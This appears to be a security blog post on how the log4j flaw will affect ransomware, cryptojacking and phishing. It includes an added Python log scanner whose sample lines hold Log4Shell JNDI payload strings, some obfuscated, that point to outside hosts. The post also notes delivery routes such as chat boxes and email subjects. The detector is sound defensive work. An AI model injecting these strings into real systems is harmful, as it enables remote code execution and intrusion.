2021 was already shaping up as perhaps the worst year ever for cybercrime, but the recently discovered log4j vulnerability has delivered a grand finale. Analysts say the flaw in the open-source logging library for Java applications is a problem of catastrophic proportions that will impact cybersecurity efforts throughout the coming year — and beyond.
Applications use logs to maintain records of past activities, including errors and warnings, to give developers insight into the state of the app. For decades, programmers have used the open source log4j code instead of writing new logging code for every app. It is now used in billions of devices, including millions of web servers.
In early December, it was discovered that attackers can trick log4j into processing a specially crafted string once it is written to a log, causing the library to fetch and run attacker-supplied code. Getting such a string logged can be as easy as typing it into the public chat box of a multiplayer online video game or setting it as the device name of a smartphone. After that, a hacker can use the compromised device to launch a variety of attacks.
Here are three ways the log4j flaw will impact the cybersecurity landscape in the coming year:
Although it will be a few months before the final numbers are tabulated, 2021 was already a record year for ransomware. One security firm estimates that the volume of attacks will surpass 700 million, a 130 percent increase over 2020, with the average recovery costs rising to $1.85 million. Those numbers are likely to continue rising in 2022.
The log4j flaw makes it easier for attackers to gain full access to systems running the logging utility. Because the malicious code is loaded by the logging library itself rather than dropped as a conventional executable, attackers can bypass antivirus, antimalware and other standard defenses. Researchers expect attackers to use the flaw to establish backdoors into corporate networks that can later be sold to ransomware operators.
There was a steep rise in reported cryptojacking attacks in 2021, as malicious actors infiltrated networks to install malware that covertly uses system resources to mine cryptocurrencies such as Bitcoin. The process drains system resources and can stress CPUs and GPUs, potentially causing devices to fail prematurely. Cryptojacking also increases energy consumption and consumes network bandwidth.
Within days of the log4j flaw’s discovery on Dec. 9, security firms detected hundreds of thousands of attempts to remotely inject coin-miner malware on corporate networks. Worse yet, analysts say the cryptojacking software increasingly includes additional malicious payloads designed to exfiltrate data from compromised systems.
Phishing is one of the most reliable vehicles for delivering all manner of malware, and we’ll almost certainly see a rise in emails with links to log4j exploits. More worrisome, however, is the possibility that phishing emails may be able to deliver a log4j payload even if the end user doesn’t click on an infected link or attachment.
Hackers might be able to simply type in a string of malicious code in the subject header of an email. During delivery, emails pass through multiple servers — many of which process email header information and write some of that into their logs. Hackers could potentially execute malicious code on any of those servers running log4j.
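From the defensive side, here is an added example (written for this post, not code from the original or from the log4j project) of how a log reviewer can flag the kind of injected strings described above: it looks for the JNDI lookup syntax the log4j flaw abuses, after unwinding the nested `${lower:...}` and `${...:-default}` lookups commonly used to hide the keyword from naive filters. The sample log lines, IP addresses and field names are constructed.

```python
import re

# Constructed sample log lines (not from the post). The first three carry
# log4j lookup strings of the kind the post describes, arriving via a
# User-Agent header, a game chat message and a device name; the last two
# are benign, one of them with a harmless lookup that must not be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 "GET / HTTP/1.1" 200 ua="${jndi:ldap://203.0.113.7/a}"',
    'chat: ${${lower:J}ndi:rmi://203.0.113.8:1099/x}',
    'device name="${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/x}"',
    'mail subject="Quarterly report Q4" host=${env:HOSTNAME}',
    '10.0.0.6 "GET /index.html HTTP/1.1" 200 ua="Mozilla/5.0"',
]

# An innermost ${...} lookup is one whose body contains no nested "${".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(match):
    """Statically evaluate one innermost lookup the way log4j 2 would, for
    the lookup types used to hide the literal word "jndi" from naive filters."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                  # ${anything:-default} resolves to "default"
        return body.split(":-", 1)[1]
    return match.group(0)             # unknown lookup type: keep it verbatim

def normalize_lookups(text, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text

def is_log4shell_attempt(line):
    """True if the line, once de-obfuscated, contains a JNDI lookup."""
    return JNDI.search(normalize_lookups(line)) is not None

def scan(lines):
    """Return (line_number, normalized_line) for every flagged line."""
    return [(n, normalize_lookups(line)) for n, line in enumerate(lines, 1)
            if is_log4shell_attempt(line)]
```

Running `scan(SAMPLE_LOGS)` flags the first three lines and leaves the benign `${env:HOSTNAME}` lookup alone, which is the distinction a filter that only matches the literal text `${jndi:` misses.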
While the new vulnerability has rightfully roiled the security industry, a number of other threats will require your attention in the coming year. Supply chain attacks, remote access challenges, cloud misconfigurations, data exfiltration and more are on the rise as well. We’ll take a closer look at these and other threats along with emerging preventive measures next week in part two of our cybersecurity trends post.